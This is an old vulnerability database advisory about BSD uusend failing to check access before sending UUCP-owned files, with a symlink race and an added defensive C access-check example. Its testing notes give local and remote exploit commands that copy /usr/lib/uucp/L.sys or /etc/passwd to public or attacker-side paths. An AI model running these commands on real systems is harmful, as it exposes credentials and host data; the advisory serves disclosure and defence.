BSD uusend Arbitrary Privileged Command Execution

1986-05-19T00:00:00
ID OSVDB:632
Type osvdb
Reporter Joe Angelo, Romain Kang
Modified 1986-05-19T00:00:00

Description

Vulnerability Description

BSD contains a flaw that may allow a malicious user to gain unauthorized privileges and/or cause unauthorized information disclosure. The issue is triggered when uusend fails to perform access checking, such as checking the USERFILE file or checking file permissions, before transmitting UUCP-owned files or other files, such as /usr/lib/uucp/L.sys or /etc/passwd. This flaw may lead to a loss of confidentiality and/or integrity.

Technical Description

A second vulnerability arises as a consequence of the primary vulnerability. A race condition exists when a malicious local user or a remote attacker causes uusend to write to uucp files that have been replaced with symbolic links to arbitrary files.
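
The access check that the description says is missing, shown for the read side as an added example (this is not uusend's source code). The function names `real_user_may_read` and `open_for_real_user` are hypothetical; the check runs against the real user's IDs on the already opened descriptor, and a symbolic link in the final path component is refused.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: may the invoking (real) user read a file with these
 * attributes? Only owner/group/other bits are used; supplementary groups
 * and ACLs are ignored (assumption, to keep the example short). */
int real_user_may_read(const struct stat *st, uid_t ruid, gid_t rgid)
{
    if (!S_ISREG(st->st_mode))
        return 0;                 /* no devices, FIFOs or directories */
    if (ruid == 0)
        return 1;
    if (st->st_uid == ruid)
        return (st->st_mode & S_IRUSR) != 0;
    if (st->st_gid == rgid)
        return (st->st_mode & S_IRGRP) != 0;
    return (st->st_mode & S_IROTH) != 0;
}

/* Open path on behalf of the real user of a setuid program. fstat() on the
 * open descriptor means the file cannot be swapped between check and use;
 * O_NOFOLLOW rejects a symlink as the last path component. */
int open_for_real_user(const char *path)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 ||
        !real_user_may_read(&st, getuid(), getgid())) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    int fd = argc > 1 ? open_for_real_user(argv[1]) : -1;
    printf("%s\n", fd >= 0 ? "allowed" : "refused");
    if (fd >= 0) close(fd);
    return fd >= 0 ? 0 : 1;
}
```
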

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: make uusend setuid/setgid to an inactive account and protect /usr/lib/uucp files.

Manual Testing Notes

Sample local exploit to obtain L.sys:

 uusend -m 666 /usr/lib/uucp/L.sys /usr/tmp/public

Sample remote exploit to obtain L.sys:

 uux target!uusend -m 666 /usr/lib/uucp/L.sys /tmp/public
 uucp target!/tmp/public local!/tmp/public

(both exploits work with /etc/passwd and any other uucp-readable file)

References:

Mail List Post: http://securitydigest.org/unix/archive/024
Mail List Post: http://securitydigest.org/unix/archive/029